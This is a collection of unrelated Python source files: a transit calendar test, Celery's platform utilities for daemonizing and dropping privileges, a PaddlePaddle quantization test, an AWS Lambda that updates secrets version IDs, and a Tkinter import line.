if """Attribute "dtype" are different""" in str(e):
pass
else:
raise e
def test_get_calendar_txc21(test_txc21_data):
from transx2gtfs.calendar import get_calendar
from transx2gtfs.transxchange import get_gtfs_info
from pandas import DataFrame
from pandas.testing import assert_frame_equal
import numpy as np
import untangle
data = untangle.parse(test_txc21_data)
# Get gtfs info
gtfs_info = get_gtfs_info(data)
assert isinstance(gtfs_info, DataFrame)
# Get GTFS calendar
gtfs_calendar = get_calendar(gtfs_info)
assert isinstance(gtfs_calendar, DataFrame)
correct_frame = DataFrame({
'service_id': ["99-PIC-B-y05-4_20200201_20200202_Sunday",
"99-PIC-B-y05-4_20200201_20200202_Saturday"],
'monday': np.int64([0, 0]), 'tuesday': np.int64([0, 0]), 'wednesday': np.int64([0, 0]),
'thursday': np.int64([0, 0]), 'friday': np.int64([0, 0]),
'saturday': np.int64([0, 1]), 'sunday': np.int64([1, 0]),
'start_date': ["20200201", "20200201"],
'end_date': ["20200202", "20200202"],
}, index=[0, 1])
try:
# Check that the frames match
assert_frame_equal(gtfs_calendar, correct_frame)
except AssertionError as e:
# Ignore the dtype int32/int64 difference
if """Attribute "dtype" are different""" in str(e):
pass
else:
raise e
|
<gh_stars>0
"""Platforms.
Utilities dealing with platform specifics: signals, daemonization,
users, groups, and so on.
"""
import atexit
import errno
import math
import numbers
import os
import platform as _platform
import signal as _signal
import sys
import warnings
from collections import namedtuple
from contextlib import contextmanager
from billiard.compat import close_open_fds, get_fdmax
# fileno used to be in this module
from kombu.utils.compat import maybe_fileno
from kombu.utils.encoding import safe_str
from .exceptions import SecurityError, SecurityWarning, reraise
from .local import try_import
try:
from billiard.process import current_process
except ImportError: # pragma: no cover
current_process = None
_setproctitle = try_import('setproctitle')
resource = try_import('resource')
pwd = try_import('pwd')
grp = try_import('grp')
mputil = try_import('multiprocessing.util')
__all__ = (
'EX_OK', 'EX_FAILURE', 'EX_UNAVAILABLE', 'EX_USAGE', 'SYSTEM',
'IS_macOS', 'IS_WINDOWS', 'SIGMAP', 'pyimplementation', 'LockFailed',
'get_fdmax', 'Pidfile', 'create_pidlock', 'close_open_fds',
'DaemonContext', 'detached', 'parse_uid', 'parse_gid', 'setgroups',
'initgroups', 'setgid', 'setuid', 'maybe_drop_privileges', 'signals',
'signal_name', 'set_process_title', 'set_mp_process_title',
'get_errno_name', 'ignore_errno', 'fd_by_path', 'isatty',
)
# exitcodes
EX_OK = getattr(os, 'EX_OK', 0)
EX_FAILURE = 1
EX_UNAVAILABLE = getattr(os, 'EX_UNAVAILABLE', 69)
EX_USAGE = getattr(os, 'EX_USAGE', 64)
EX_CANTCREAT = getattr(os, 'EX_CANTCREAT', 73)
SYSTEM = _platform.system()
IS_macOS = SYSTEM == 'Darwin'
IS_WINDOWS = SYSTEM == 'Windows'
DAEMON_WORKDIR = '/'
PIDFILE_FLAGS = os.O_CREAT | os.O_EXCL | os.O_WRONLY
PIDFILE_MODE = ((os.R_OK | os.W_OK) << 6) | ((os.R_OK) << 3) | (os.R_OK)
PIDLOCKED = """ERROR: Pidfile ({0}) already exists.
Seems we're already running? (pid: {1})"""
_range = namedtuple('_range', ('start', 'stop'))
ROOT_DISALLOWED = """\
Running a worker with superuser privileges when the
worker accepts messages serialized with pickle is a very bad idea!
If you really want to continue then you have to set the C_FORCE_ROOT
environment variable (but please think about this before you do).
User information: uid={uid} euid={euid} gid={gid} egid={egid}
"""
ROOT_DISCOURAGED = """\
You're running the worker with superuser privileges: this is
absolutely not recommended!
Please specify a different user using the --uid option.
User information: uid={uid} euid={euid} gid={gid} egid={egid}
"""
ASSUMING_ROOT = """\
An entry for the specified gid or egid was not found.
We're assuming this is a potential security issue.
"""
SIGNAMES = {
sig for sig in dir(_signal)
if sig.startswith('SIG') and '_' not in sig
}
SIGMAP = {getattr(_signal, name): name for name in SIGNAMES}
def isatty(fh):
"""Return true if the process has a controlling terminal."""
try:
return fh.isatty()
except AttributeError:
pass
def pyimplementation():
"""Return string identifying the current Python implementation."""
if hasattr(_platform, 'python_implementation'):
return _platform.python_implementation()
elif sys.platform.startswith('java'):
return 'Jython ' + sys.platform
elif hasattr(sys, 'pypy_version_info'):
v = '.'.join(str(p) for p in sys.pypy_version_info[:3])
if sys.pypy_version_info[3:]:
v += '-' + ''.join(str(p) for p in sys.pypy_version_info[3:])
return 'PyPy ' + v
else:
return 'CPython'
class LockFailed(Exception):
"""Raised if a PID lock can't be acquired."""
class Pidfile:
"""Pidfile.
This is the type returned by :func:`create_pidlock`.
See Also:
Best practice is to not use this directly but rather use
the :func:`create_pidlock` function instead:
more convenient and also removes stale pidfiles (when
the process holding the lock is no longer running).
"""
#: Path to the pid lock file.
path = None
def __init__(self, path):
self.path = os.path.abspath(path)
def acquire(self):
"""Acquire lock."""
try:
self.write_pid()
except OSError as exc:
reraise(LockFailed, LockFailed(str(exc)), sys.exc_info()[2])
return self
__enter__ = acquire
def is_locked(self):
"""Return true if the pid lock exists."""
return os.path.exists(self.path)
def release(self, *args):
"""Release lock."""
self.remove()
__exit__ = release
def read_pid(self):
"""Read and return the current pid."""
with ignore_errno('ENOENT'):
with open(self.path) as fh:
line = fh.readline()
if line.strip() == line: # must contain '\n'
raise ValueError(
f'Partial or invalid pidfile {self.path}')
try:
return int(line.strip())
except ValueError:
raise ValueError(
f'pidfile {self.path} contents invalid.')
def remove(self):
"""Remove the lock."""
with ignore_errno(errno.ENOENT, errno.EACCES):
os.unlink(self.path)
def remove_if_stale(self):
"""Remove the lock if the process isn't running.
I.e. process does not respons to signal.
"""
try:
pid = self.read_pid()
except ValueError:
print('Broken pidfile found - Removing it.', file=sys.stderr)
self.remove()
return True
if not pid:
self.remove()
return True
try:
os.kill(pid, 0)
except os.error as exc:
if exc.errno == errno.ESRCH or exc.errno == errno.EPERM:
print('Stale pidfile exists - Removing it.', file=sys.stderr)
self.remove()
return True
except SystemError:
print('Stale pidfile exists - Removing it.', file=sys.stderr)
self.remove()
return True
return False
def write_pid(self):
pid = os.getpid()
content = f'{pid}\n'
pidfile_fd = os.open(self.path, PIDFILE_FLAGS, PIDFILE_MODE)
pidfile = os.fdopen(pidfile_fd, 'w')
try:
pidfile.write(content)
# flush and sync so that the re-read below works.
pidfile.flush()
try:
os.fsync(pidfile_fd)
except AttributeError: # pragma: no cover
pass
finally:
pidfile.close()
rfh = open(self.path)
try:
if rfh.read() != content:
raise LockFailed(
"Inconsistency: Pidfile content doesn't match at re-read")
finally:
rfh.close()
PIDFile = Pidfile # noqa: E305 XXX compat alias
def create_pidlock(pidfile):
"""Create and verify pidfile.
If the pidfile already exists the program exits with an error message,
however if the process it refers to isn't running anymore, the pidfile
is deleted and the program continues.
This function will automatically install an :mod:`atexit` handler
to release the lock at exit, you can skip this by calling
:func:`_create_pidlock` instead.
Returns:
Pidfile: used to manage the lock.
Example:
>>> pidlock = create_pidlock('/var/run/app.pid')
"""
pidlock = _create_pidlock(pidfile)
atexit.register(pidlock.release)
return pidlock
def _create_pidlock(pidfile):
pidlock = Pidfile(pidfile)
if pidlock.is_locked() and not pidlock.remove_if_stale():
print(PIDLOCKED.format(pidfile, pidlock.read_pid()), file=sys.stderr)
raise SystemExit(EX_CANTCREAT)
pidlock.acquire()
return pidlock
def fd_by_path(paths):
"""Return a list of file descriptors.
This method returns list of file descriptors corresponding to
file paths passed in paths variable.
Arguments:
paths: List[str]: List of file paths.
Returns:
List[int]: List of file descriptors.
Example:
>>> keep = fd_by_path(['/dev/urandom', '/my/precious/'])
"""
stats = set()
for path in paths:
try:
fd = os.open(path, os.O_RDONLY)
except OSError:
continue
try:
stats.add(os.fstat(fd)[1:3])
finally:
os.close(fd)
def fd_in_stats(fd):
try:
return os.fstat(fd)[1:3] in stats
except OSError:
return False
return [_fd for _fd in range(get_fdmax(2048)) if fd_in_stats(_fd)]
class DaemonContext:
"""Context manager daemonizing the process."""
_is_open = False
def __init__(self, pidfile=None, workdir=None, umask=None,
fake=False, after_chdir=None, after_forkers=True,
**kwargs):
if isinstance(umask, str):
# octal or decimal, depending on initial zero.
umask = int(umask, 8 if umask.startswith('0') else 10)
self.workdir = workdir or DAEMON_WORKDIR
self.umask = umask
self.fake = fake
self.after_chdir = after_chdir
self.after_forkers = after_forkers
self.stdfds = (sys.stdin, sys.stdout, sys.stderr)
def redirect_to_null(self, fd):
if fd is not None:
dest = os.open(os.devnull, os.O_RDWR)
os.dup2(dest, fd)
def open(self):
if not self._is_open:
if not self.fake:
self._detach()
os.chdir(self.workdir)
if self.umask is not None:
os.umask(self.umask)
if self.after_chdir:
self.after_chdir()
if not self.fake:
# We need to keep /dev/urandom from closing because
# shelve needs it, and Beat needs shelve to start.
keep = list(self.stdfds) + fd_by_path(['/dev/urandom'])
close_open_fds(keep)
for fd in self.stdfds:
self.redirect_to_null(maybe_fileno(fd))
if self.after_forkers and mputil is not None:
mputil._run_after_forkers()
self._is_open = True
__enter__ = open
def close(self, *args):
if self._is_open:
self._is_open = False
__exit__ = close
def _detach(self):
if os.fork() == 0: # first child
os.setsid() # create new session
if os.fork() > 0: # pragma: no cover
# second child
os._exit(0)
else:
os._exit(0)
return self
def detached(logfile=None, pidfile=None, uid=None, gid=None, umask=0,
workdir=None, fake=False, **opts):
"""Detach the current process in the background (daemonize).
Arguments:
logfile (str): Optional log file.
The ability to write to this file
will be verified before the process is detached.
pidfile (str): Optional pid file.
The pidfile won't be created,
as this is the responsibility of the child. But the process will
exit if the pid lock exists and the pid written is still running.
uid (int, str): Optional user id or user name to change
effective privileges to.
gid (int, str): Optional group id or group name to change
effective privileges to.
umask (str, int): Optional umask that'll be effective in
the child process.
workdir (str): Optional new working directory.
fake (bool): Don't actually detach, intended for debugging purposes.
**opts (Any): Ignored.
Example:
>>> from celery.platforms import detached, create_pidlock
>>> with detached(
... logfile='/var/log/app.log',
... pidfile='/var/run/app.pid',
... uid='nobody'):
... # Now in detached child process with effective user set to nobody,
... # and we know that our logfile can be written to, and that
... # the pidfile isn't locked.
... pidlock = create_pidlock('/var/run/app.pid')
...
... # Run the program
... program.run(logfile='/var/log/app.log')
"""
if not resource:
raise RuntimeError('This platform does not support detach.')
workdir = os.getcwd() if workdir is None else workdir
signals.reset('SIGCLD') # Make sure SIGCLD is using the default handler.
maybe_drop_privileges(uid=uid, gid=gid)
def after_chdir_do():
# Since without stderr any errors will be silently suppressed,
# we need to know that we have access to the logfile.
logfile and open(logfile, 'a').close()
# Doesn't actually create the pidfile, but makes sure it's not stale.
if pidfile:
_create_pidlock(pidfile).release()
return DaemonContext(
umask=umask, workdir=workdir, fake=fake, after_chdir=after_chdir_do,
)
def parse_uid(uid):
"""Parse user id.
Arguments:
uid (str, int): Actual uid, or the username of a user.
Returns:
int: The actual uid.
"""
try:
return int(uid)
except ValueError:
try:
return pwd.getpwnam(uid).pw_uid
except (AttributeError, KeyError):
raise KeyError(f'User does not exist: {uid}')
def parse_gid(gid):
"""Parse group id.
Arguments:
gid (str, int): Actual gid, or the name of a group.
Returns:
int: The actual gid of the group.
"""
try:
return int(gid)
except ValueError:
try:
return grp.getgrnam(gid).gr_gid
except (AttributeError, KeyError):
raise KeyError(f'Group does not exist: {gid}')
def _setgroups_hack(groups):
# :fun:`setgroups` may have a platform-dependent limit,
# and it's not always possible to know in advance what this limit
# is, so we use this ugly hack stolen from glibc.
groups = groups[:]
while 1:
try:
return os.setgroups(groups)
except ValueError: # error from Python's check.
if len(groups) <= 1:
raise
groups[:] = groups[:-1]
except OSError as exc: # error from the OS.
if exc.errno != errno.EINVAL or len(groups) <= 1:
raise
groups[:] = groups[:-1]
def setgroups(groups):
"""Set active groups from a list of group ids."""
max_groups = None
try:
max_groups = os.sysconf('SC_NGROUPS_MAX')
except Exception: # pylint: disable=broad-except
pass
try:
return _setgroups_hack(groups[:max_groups])
except OSError as exc:
if exc.errno != errno.EPERM:
raise
if any(group not in groups for group in os.getgroups()):
# we shouldn't be allowed to change to this group.
raise
def initgroups(uid, gid):
"""Init process group permissions.
Compat version of :func:`os.initgroups` that was first
added to Python 2.7.
"""
if not pwd: # pragma: no cover
return
username = pwd.getpwuid(uid)[0]
if hasattr(os, 'initgroups'): # Python 2.7+
return os.initgroups(username, gid)
groups = [gr.gr_gid for gr in grp.getgrall()
if username in gr.gr_mem]
setgroups(groups)
def setgid(gid):
"""Version of :func:`os.setgid` supporting group names."""
os.setgid(parse_gid(gid))
def setuid(uid):
"""Version of :func:`os.setuid` supporting usernames."""
os.setuid(parse_uid(uid))
def maybe_drop_privileges(uid=None, gid=None):
"""Change process privileges to new user/group.
If UID and GID is specified, the real user/group is changed.
If only UID is specified, the real user is changed, and the group is
changed to the users primary group.
If only GID is specified, only the group is changed.
"""
if sys.platform == 'win32':
return
if os.geteuid():
# no point trying to setuid unless we're root.
if not os.getuid():
raise SecurityError('contact support')
uid = uid and parse_uid(uid)
gid = gid and parse_gid(gid)
if uid:
_setuid(uid, gid)
else:
gid and setgid(gid)
if uid and not os.getuid() and not os.geteuid():
raise SecurityError('Still root uid after drop privileges!')
if gid and not os.getgid() and not os.getegid():
raise SecurityError('Still root gid after drop privileges!')
def _setuid(uid, gid):
# If GID isn't defined, get the primary GID of the user.
if not gid and pwd:
gid = pwd.getpwuid(uid).pw_gid
# Must set the GID before initgroups(), as setgid()
# is known to zap the group list on some platforms.
# setgid must happen before setuid (otherwise the setgid operation
# may fail because of insufficient privileges and possibly stay
# in a privileged group).
setgid(gid)
initgroups(uid, gid)
# at last:
setuid(uid)
# ... and make sure privileges cannot be restored:
try:
setuid(0)
except OSError as exc:
if exc.errno != errno.EPERM:
raise
# we should get here: cannot restore privileges,
# everything was fine.
else:
raise SecurityError(
'non-root user able to restore privileges after setuid.')
class Signals:
"""Convenience interface to :mod:`signals`.
If the requested signal isn't supported on the current platform,
the operation will be ignored.
Example:
>>> from celery.platforms import signals
>>> from proj.handlers import my_handler
>>> signals['INT'] = my_handler
>>> signals['INT']
my_handler
>>> signals.supported('INT')
True
>>> signals.signum('INT')
2
>>> signals.ignore('USR1')
>>> signals['USR1'] == signals.ignored
True
>>> signals.reset('USR1')
>>> signals['USR1'] == signals.default
True
>>> from proj.handlers import exit_handler, hup_handler
>>> signals.update(INT=exit_handler,
... TERM=exit_handler,
... HUP=hup_handler)
"""
ignored = _signal.SIG_IGN
default = _signal.SIG_DFL
if hasattr(_signal, 'setitimer'):
def arm_alarm(self, seconds):
_signal.setitimer(_signal.ITIMER_REAL, seconds)
else: # pragma: no cover
try:
from itimer import alarm as _itimer_alarm # noqa
except ImportError:
def arm_alarm(self, seconds): # noqa
_signal.alarm(math.ceil(seconds))
else: # pragma: no cover
def arm_alarm(self, seconds): # noqa
return _itimer_alarm(seconds) # noqa
def reset_alarm(self):
return _signal.alarm(0)
def supported(self, name):
"""Return true value if signal by ``name`` exists on this platform."""
try:
self.signum(name)
except AttributeError:
return False
else:
return True
def signum(self, name):
"""Get signal number by name."""
if isinstance(name, numbers.Integral):
return name
if not isinstance(name, str) \
or not name.isupper():
raise TypeError('signal name must be uppercase string.')
if not name.startswith('SIG'):
name = 'SIG' + name
return getattr(_signal, name)
def reset(self, *signal_names):
"""Reset signals to the default signal handler.
Does nothing if the platform has no support for signals,
or the specified signal in particular.
"""
self.update((sig, self.default) for sig in signal_names)
def ignore(self, *names):
"""Ignore signal using :const:`SIG_IGN`.
Does nothing if the platform has no support for signals,
or the specified signal in particular.
"""
self.update((sig, self.ignored) for sig in names)
def __getitem__(self, name):
return _signal.getsignal(self.signum(name))
def __setitem__(self, name, handler):
"""Install signal handler.
Does nothing if the current platform has no support for signals,
or the specified signal in particular.
"""
try:
_signal.signal(self.signum(name), handler)
except (AttributeError, ValueError):
pass
def update(self, _d_=None, **sigmap):
"""Set signal handlers from a mapping."""
for name, handler in dict(_d_ or {}, **sigmap).items():
self[name] = handler
signals = Signals()
get_signal = signals.signum # compat
install_signal_handler = signals.__setitem__ # compat
reset_signal = signals.reset # compat
ignore_signal = signals.ignore # compat
def signal_name(signum):
"""Return name of signal from signal number."""
return SIGMAP[signum][3:]
def strargv(argv):
arg_start = 2 if 'manage' in argv[0] else 1
if len(argv) > arg_start:
return ' '.join(argv[arg_start:])
return ''
def set_process_title(progname, info=None):
"""Set the :command:`ps` name for the currently running process.
Only works if :pypi:`setproctitle` is installed.
"""
proctitle = f'[{progname}]'
proctitle = f'{proctitle} {info}' if info else proctitle
if _setproctitle:
_setproctitle.setproctitle(safe_str(proctitle))
return proctitle
if os.environ.get('NOSETPS'): # pragma: no cover
def set_mp_process_title(*a, **k):
"""Disabled feature."""
else:
def set_mp_process_title(progname, info=None, hostname=None): # noqa
"""Set the :command:`ps` name from the current process name.
Only works if :pypi:`setproctitle` is installed.
"""
if hostname:
progname = f'{progname}: {hostname}'
name = current_process().name if current_process else 'MainProcess'
return set_process_title(f'{progname}:{name}', info=info)
def get_errno_name(n):
"""Get errno for string (e.g., ``ENOENT``)."""
if isinstance(n, str):
return getattr(errno, n)
return n
@contextmanager
def ignore_errno(*errnos, **kwargs):
"""Context manager to ignore specific POSIX error codes.
Takes a list of error codes to ignore: this can be either
the name of the code, or the code integer itself::
>>> with ignore_errno('ENOENT'):
... with open('foo', 'r') as fh:
... return fh.read()
>>> with ignore_errno(errno.ENOENT, errno.EPERM):
... pass
Arguments:
types (Tuple[Exception]): A tuple of exceptions to ignore
(when the errno matches). Defaults to :exc:`Exception`.
"""
types = kwargs.get('types') or (Exception,)
errnos = [get_errno_name(errno) for errno in errnos]
try:
yield
except types as exc:
if not hasattr(exc, 'errno'):
raise
if exc.errno not in errnos:
raise
def check_privileges(accept_content):
if grp is None or pwd is None:
return
pickle_or_serialize = ('pickle' in accept_content
or 'application/group-python-serialize' in accept_content)
uid = os.getuid() if hasattr(os, 'getuid') else 65535
gid = os.getgid() if hasattr(os, 'getgid') else 65535
euid = os.geteuid() if hasattr(os, 'geteuid') else 65535
egid = os.getegid() if hasattr(os, 'getegid') else 65535
if hasattr(os, 'fchown'):
if not all(hasattr(os, attr)
for attr in ('getuid', 'getgid', 'geteuid', 'getegid')):
raise SecurityError('suspicious platform, contact support')
# Get the group database entry for the current user's group and effective
# group id using grp.getgrgid() method
# We must handle the case where either the gid or the egid are not found.
try:
gid_entry = grp.getgrgid(gid)
egid_entry = grp.getgrgid(egid)
except KeyError:
warnings.warn(SecurityWarning(ASSUMING_ROOT))
_warn_or_raise_security_error(egid, euid, gid, uid,
pickle_or_serialize)
return
# Get the group and effective group name based on gid
gid_grp_name = gid_entry[0]
egid_grp_name = egid_entry[0]
# Create lists to use in validation step later.
gids_in_use = (gid_grp_name, egid_grp_name)
groups_with_security_risk = ('sudo', 'wheel')
is_root = uid == 0 or euid == 0
# Confirm that the gid and egid are not one that
# can be used to escalate privileges.
if is_root or any(group in gids_in_use
for group in groups_with_security_risk):
_warn_or_raise_security_error(egid, euid, gid, uid,
pickle_or_serialize)
def _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize):
c_force_root = os.environ.get('C_FORCE_ROOT', False)
if pickle_or_serialize and not c_force_root:
raise SecurityError(ROOT_DISALLOWED.format(
uid=uid, euid=euid, gid=gid, egid=egid,
))
warnings.warn(SecurityWarning(ROOT_DISCOURAGED.format(
uid=uid, euid=euid, gid=gid, egid=egid,
)))
|
# copyright (c) 2020 paddlepaddle authors. all rights reserved.
#
# licensed under the apache license, version 2.0 (the "license");
# you may not use this file except in compliance with the license.
# you may obtain a copy of the license at
#
# http://www.apache.org/licenses/license-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the license is distributed on an "as is" basis,
# without warranties or conditions of any kind, either express or implied.
# see the license for the specific language governing permissions and
# limitations under the license.
from __future__ import print_function
import os
import numpy as np
import random
import unittest
import logging
import paddle
import paddle.nn as nn
from paddle.optimizer import Adam
from paddle.fluid.contrib.slim.quantization import ImperativeQuantAware
from paddle.fluid.contrib.slim.quantization import QuantizationTransformPass
from paddle.nn import Sequential
from paddle.fluid.dygraph import Conv2D
from paddle.fluid.dygraph import Pool2D
from paddle.fluid.dygraph import Linear
from paddle.nn.quant.quant_layers import QuantizedConv2DTranspose
from paddle.fluid.log_helper import get_logger
from paddle.fluid.framework import _test_eager_guard
os.environ["CPU_NUM"] = "1"
_logger = get_logger(__name__,
logging.INFO,
fmt='%(asctime)s-%(levelname)s: %(message)s')
class PACT(nn.Layer):
def __init__(self, init_value=20):
super(PACT, self).__init__()
alpha_attr = paddle.ParamAttr(
name=self.full_name() + ".pact",
initializer=paddle.nn.initializer.Constant(value=init_value))
self.alpha = self.create_parameter(shape=[1],
attr=alpha_attr,
dtype='float32')
def forward(self, x):
out_left = paddle.nn.functional.relu(x - self.alpha)
out_right = paddle.nn.functional.relu(-self.alpha - x)
x = x - out_left + out_right
return x
class CustomQAT(nn.Layer):
def __init__(self):
super(CustomQAT, self).__init__()
attr = paddle.ParamAttr(initializer=paddle.nn.initializer.Constant(
value=1.0))
self.u_param = self.create_parameter(shape=[1],
attr=attr,
dtype='float32')
self.l_param = self.create_parameter(shape=[1],
attr=attr,
dtype='float32')
self.alpha_param = self.create_parameter(shape=[1],
attr=attr,
dtype='float32')
self.upper = self.create_parameter(shape=[1],
attr=attr,
dtype='float32')
self.upper.stop_gradient = True
self.lower = self.create_parameter(shape=[1],
attr=attr,
dtype='float32')
self.lower.stop_gradient = True
def forward(self, x):
def clip(x, upper, lower):
x = x + paddle.nn.functional.relu(lower - x)
x = x - paddle.nn.functional.relu(x - upper)
return x
def phi_function(x, mi, alpha, delta):
s = 1 / (1 - alpha)
k = paddle.log(2 / alpha - 1) * (1 / delta)
x = (paddle.tanh((x - mi) * k)) * s
return x
def dequantize(x, lower_bound, delta, interval):
x = ((x + 1) / 2 + interval) * delta + lower_bound
return x
bit = 8
bit_range = 2**bit - 1
paddle.assign(self.upper * 0.9 + self.u_param * 0.1, self.upper)
paddle.assign(self.lower * 0.9 + self.l_param * 0.1, self.lower)
x = clip(x, self.upper, self.lower)
delta = (self.upper - self.lower) / bit_range
interval = (x - self.lower) / delta
mi = (interval + 0.5) * delta + self.l_param
x = phi_function(x, mi, self.alpha_param, delta)
x = dequantize(x, self.l_param, delta, interval)
return x
class ModelForConv2dT(nn.Layer):
def __init__(self, num_classes=10):
super(ModelForConv2dT, self).__init__()
self.features = nn.Conv2DTranspose(4, 6, (3, 3))
self.fc = Linear(input_dim=600, output_dim=num_classes)
def forward(self, inputs):
x = self.features(inputs)
x = paddle.flatten(x, 1)
x = self.fc(x)
return x
class ImperativeLenet(paddle.nn.Layer):
def __init__(self, num_classes=10, classifier_activation='softmax'):
super(ImperativeLenet, self).__init__()
self.features = Sequential(
Conv2D(num_channels=1,
num_filters=6,
filter_size=3,
stride=1,
padding=1),
Pool2D(pool_size=2, pool_type='max', pool_stride=2),
Conv2D(num_channels=6,
num_filters=16,
filter_size=5,
stride=1,
padding=0),
Pool2D(pool_size=2, pool_type='max', pool_stride=2))
self.fc = Sequential(
Linear(input_dim=400, output_dim=120),
Linear(input_dim=120, output_dim=84),
Linear(input_dim=84,
output_dim=num_classes,
act=classifier_activation))
def forward(self, inputs):
x = self.features(inputs)
x = paddle.flatten(x, 1)
x = self.fc(x)
return x
class TestUserDefinedActPreprocess(unittest.TestCase):
def setUp(self):
_logger.info("test act_preprocess")
self.imperative_qat = ImperativeQuantAware(act_preprocess_layer=PACT)
def func_quant_aware_training(self):
imperative_qat = self.imperative_qat
seed = 1
np.random.seed(seed)
paddle.static.default_main_program().random_seed = seed
paddle.static.default_startup_program().random_seed = seed
lenet = ImperativeLenet()
fixed_state = {}
param_init_map = {}
for name, param in lenet.named_parameters():
p_shape = param.numpy().shape
p_value = param.numpy()
if name.endswith("bias"):
value = np.zeros_like(p_value).astype('float32')
else:
value = np.random.normal(
loc=0.0, scale=0.01,
size=np.product(p_shape)).reshape(p_shape).astype('float32')
fixed_state[name] = value
param_init_map[param.name] = value
lenet.set_dict(fixed_state)
imperative_qat.quantize(lenet)
adam = Adam(learning_rate=0.001, parameters=lenet.parameters())
dynamic_loss_rec = []
#for CI coverage
conv_transpose = ModelForConv2dT()
imperative_qat.quantize(conv_transpose)
x_var = paddle.uniform((2, 4, 8, 8), dtype='float32', min=-1., max=1.)
conv_transpose(x_var)
def train(model):
adam = Adam(learning_rate=0.001, parameters=model.parameters())
epoch_num = 1
for epoch in range(epoch_num):
model.train()
for batch_id, data in enumerate(train_reader()):
x_data = np.array([x[0].reshape(1, 28, 28)
for x in data]).astype('float32')
y_data = np.array([x[1] for x in data
]).astype('int64').reshape(-1, 1)
img = paddle.to_tensor(x_data)
label = paddle.to_tensor(y_data)
out = model(img)
acc = paddle.metric.accuracy(out, label, k=1)
loss = nn.functional.loss.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
adam.minimize(avg_loss)
model.clear_gradients()
if batch_id % 50 == 0:
_logger.info(
"Train | At epoch {} step {}: loss = {:}, acc= {:}".
format(epoch, batch_id, avg_loss.numpy(),
acc.numpy()))
break
def test(model):
model.eval()
avg_acc = [[], []]
for batch_id, data in enumerate(test_reader()):
x_data = np.array([x[0].reshape(1, 28, 28)
for x in data]).astype('float32')
y_data = np.array([x[1] for x in data
]).astype('int64').reshape(-1, 1)
img = paddle.to_tensor(x_data)
label = paddle.to_tensor(y_data)
out = model(img)
acc_top1 = paddle.metric.accuracy(input=out, label=label, k=1)
acc_top5 = paddle.metric.accuracy(input=out, label=label, k=5)
avg_acc[0].append(acc_top1.numpy())
avg_acc[1].append(acc_top5.numpy())
if batch_id % 100 == 0:
_logger.info(
"Test | step {}: acc1 = {:}, acc5 = {:}".format(
batch_id, acc_top1.numpy(), acc_top5.numpy()))
train_reader = paddle.batch(paddle.dataset.mnist.train(),
batch_size=512,
drop_last=True)
test_reader = paddle.batch(paddle.dataset.mnist.test(), batch_size=512)
train(lenet)
test(lenet)
def test_quant_aware_training(self):
with _test_eager_guard():
self.func_quant_aware_training()
self.func_quant_aware_training()
class TestUserDefinedWeightPreprocess(TestUserDefinedActPreprocess):
def setUp(self):
_logger.info("test weight_preprocess")
self.imperative_qat = ImperativeQuantAware(weight_preprocess_layer=PACT)
class TestUserDefinedActQuantize(TestUserDefinedActPreprocess):
def setUp(self):
_logger.info("test act_quantize")
self.imperative_qat = ImperativeQuantAware(act_quantize_layer=CustomQAT)
class TestUserDefinedWeightQuantize(TestUserDefinedActPreprocess):
def setUp(self):
_logger.info("test weight_quantize")
self.imperative_qat = ImperativeQuantAware(
weight_quantize_layer=CustomQAT)
if __name__ == '__main__':
unittest.main()
|
<reponame>PRX/Infrastructure<filename>secrets/lambdas/secrets-s3-update/lambda_function.py
# Invoked by: S3 Object Change
# Returns: Error or status message
#
# Environment variables for applications are stored in encrypted s3 files.
# When those files are updated, the env config file should be updated with the
# current object version number for the application for that app and env
import zipfile
import boto3
import traceback
import json
import uuid
import os
from botocore.client import Config
#########
# helpers
#########
s3 = boto3.client("s3", config=Config(signature_version="s3v4"))
abbreviations = {"dev": "development", "stag": "staging", "prod": "production"}
def env_abbr_to_full(abbr):
return abbreviations[abbr]
def temp_file_path():
return "/tmp/{0}".format(uuid.uuid4())
##############
# main methods
##############
def get_record_info(record):
bucket = record["s3"]["bucket"]["name"]
key = record["s3"]["object"]["key"]
app, env, file = key.split("/")
# print(app, env, file)
version = s3.head_object(Bucket=bucket, Key=key)["VersionId"]
return {"app": app, "env": env, "file": file, "version": version}
def get_secrets_changes(event):
changes = {}
for record in event["Records"]:
info = get_record_info(record)
if info["file"] == "secrets":
changes.setdefault(info["env"], []).append(info)
return changes
def get_config(env):
environment = env_abbr_to_full(env)
source_bucket = os.environ["INFRASTRUCTURE_CONFIG_BUCKET"]
source_key = os.environ["INFRASTRUCTURE_CONFIG_%s_KEY" % environment.upper()]
archive_path = temp_file_path()
print("...Getting %s config: %s/%s..." % (environment, source_bucket, source_key))
print("...Writing file to %s..." % archive_path)
s3.download_file(source_bucket, source_key, archive_path)
with zipfile.ZipFile(archive_path, "r") as archive:
env_config = json.load(archive.open(environment + ".json"))
return env_config
def update_config(env, changes):
env_config = get_config(env)
for change in changes:
app_key = change["app"].title() + "SecretsVersion"
if app_key in env_config["Parameters"]:
current_val = env_config["Parameters"][app_key]
else:
current_val = None
new_val = change["version"]
print("...Set %s from %s to %s..." % (app_key, current_val, new_val))
env_config["Parameters"][app_key] = new_val
return env_config
def upload_config(env, config):
print("...Generating template config version...")
body = json.dumps(config)
archive_path = temp_file_path()
environment = env_abbr_to_full(env)
archive = zipfile.ZipFile(archive_path, mode="w")
archive.writestr(environment + ".json", body, compress_type=zipfile.ZIP_DEFLATED)
archive.close()
source_bucket = os.environ["INFRASTRUCTURE_CONFIG_BUCKET"]
source_key = os.environ["INFRASTRUCTURE_CONFIG_%s_KEY" % environment.upper()]
s3.upload_file(archive_path, source_bucket, source_key)
print("...Wrote update to %s/%s..." % (source_bucket, source_key))
def lambda_handler(event, context):
try:
print("Starting secrets update...")
# get all the secrets changes, keyed by env
changes = get_secrets_changes(event)
# for each env, update with change, then upload zipped file
for env in changes.keys():
upload_config(env, update_config(env, changes[env]))
return "...Done"
except Exception as e:
print("Function failed due to exception.")
print(e)
traceback.print_exc()
################################################################################
# local test
################################################################################
if os.environ.get("LOCAL_TEST"):
os.environ[
"INFRASTRUCTURE_CONFIG_DEVELOPMENT_KEY"
] = "template-config-development.zip"
os.environ["INFRASTRUCTURE_CONFIG_BUCKET"] = "prx-infrastructure-us-east-1-config"
test_event = {
"Records": [
{
"s3": {
"object": {"key": "castle/dev/secrets"},
"bucket": {"name": "prx_test_aws_secrets-secrets"},
}
}
]
}
test_context = {}
lambda_handler(test_event, test_context)
|
# pylint: disable=C0103,C0111,W0614,W0401,C0200,C0325
from Tkinter import *
